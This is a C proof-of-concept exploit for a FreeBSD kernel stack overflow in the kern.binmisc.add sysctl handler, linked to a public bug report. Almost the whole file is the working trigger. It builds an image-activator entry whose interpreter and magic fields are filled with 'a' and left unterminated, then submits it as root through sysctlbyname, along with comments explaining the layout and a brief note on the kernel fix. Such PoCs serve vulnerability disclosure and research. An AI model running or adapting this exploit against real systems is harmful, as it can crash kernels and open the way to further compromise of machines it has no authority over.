PoC for kernel stack overflow in sysctl handler for kern.binmisc.add
/*
PoC for kernel stack overflow in sysctl handler for kern.binmisc.add:
https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=206761#c0
su
kldload imgact_binmisc
./x
- CTurt
*/
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <dlfcn.h>
#include <sys/types.h>
#include <sys/sysctl.h>
//#include <sys/imgact_binmisc.h>
/*
 * Local copies of the constants the entry struct below depends on, so the
 * PoC builds without the kernel header (the sys/imgact_binmisc.h include is
 * commented out above). They appear to mirror the kernel's values; if the
 * kernel definition ever changes, the struct layout here would drift.
 */
#define MAXPATHLEN 1024
#define IBE_VERSION 1
#define IBE_ARG_LEN_MAX 256
#define IBE_NAME_MAX 32
#define IBE_INTERP_LEN_MAX (MAXPATHLEN + IBE_ARG_LEN_MAX) /* 1280 bytes: path plus args */
#define IBE_MAGIC_MAX 256
/*
 * Userland mirror of the kernel's binmisc entry record. The whole struct is
 * passed as the raw "new value" of the kern.binmisc.add sysctl in main(), so
 * field order and sizes presumably have to match the kernel's layout exactly
 * (not verifiable from this file alone). Three of the four buffers are plain
 * fixed-size char/uint8_t arrays with no separate length field, which is why
 * termination of their contents matters on the kernel side.
 */
typedef struct ximgact_binmisc_entry {
uint32_t xbe_version; /* Struct version(IBE_VERSION) */
uint32_t xbe_flags; /* Entry flags (IBF_*) */
uint32_t xbe_moffset; /* Magic offset in header */
uint32_t xbe_msize; /* Magic size */
uint32_t spare[3]; /* Spare fields for future use */
char xbe_name[IBE_NAME_MAX]; /* Unique interpreter name */
char xbe_interpreter[IBE_INTERP_LEN_MAX]; /* Interpreter path + args */
uint8_t xbe_magic[IBE_MAGIC_MAX]; /* Header Magic */
uint8_t xbe_mask[IBE_MAGIC_MAX]; /* Magic Mask */
} ximgact_binmisc_entry_t;
/*
 * File-scope object, so it has static storage and starts zeroed: the fields
 * main() never assigns (xbe_flags, xbe_moffset, xbe_msize, spare) are sent
 * to the kernel as 0.
 */
ximgact_binmisc_entry_t xbe;
/*
 * Entry point. Builds a single binmisc entry in the global xbe and submits
 * it through the write-only kern.binmisc.add sysctl, then prints the call's
 * return value and errno. Requires root (see the "su" step in the header
 * comment) and the imgact_binmisc module to be loaded. The exit status is
 * always 0; the sysctl outcome is only reported, never acted on.
 */
int main(void) {
int result = 0;
/* Cleared up front so the value printed at the end is attributable to sysctlbyname(). */
errno = 0;
xbe.xbe_version = IBE_VERSION;
/* Short literal; fits within the IBE_NAME_MAX-byte name field with its terminator. */
strcpy(xbe.xbe_name, "CTurt");
/*
 * Fill xbe_interpreter completely with 'a', leaving no terminating NUL. This
 * is the triggering condition for the stack overflow described in the linked
 * bug report: the handler presumably treats the field as a C string (TODO
 * confirm against the kernel source). Defensive fix on the kernel side is to
 * bound and NUL-terminate user-supplied fields before using them as strings.
 */
memset(&xbe.xbe_interpreter, 'a', IBE_INTERP_LEN_MAX);
memset(&xbe.xbe_magic, 'a', IBE_MAGIC_MAX);
memset(&xbe.xbe_mask, 'a', IBE_MAGIC_MAX);
/* Only the mask gets a terminator; magic and interpreter remain unterminated. */
xbe.xbe_mask[IBE_MAGIC_MAX - 1] = 0;
size_t size = sizeof(xbe);
/* No old value is requested (NULL, NULL); the entire struct is the new value. */
result = sysctlbyname("kern.binmisc.add", NULL, NULL, &xbe, size);
printf("result %d\n", result);
printf("errno %d\n", errno);
return 0;
}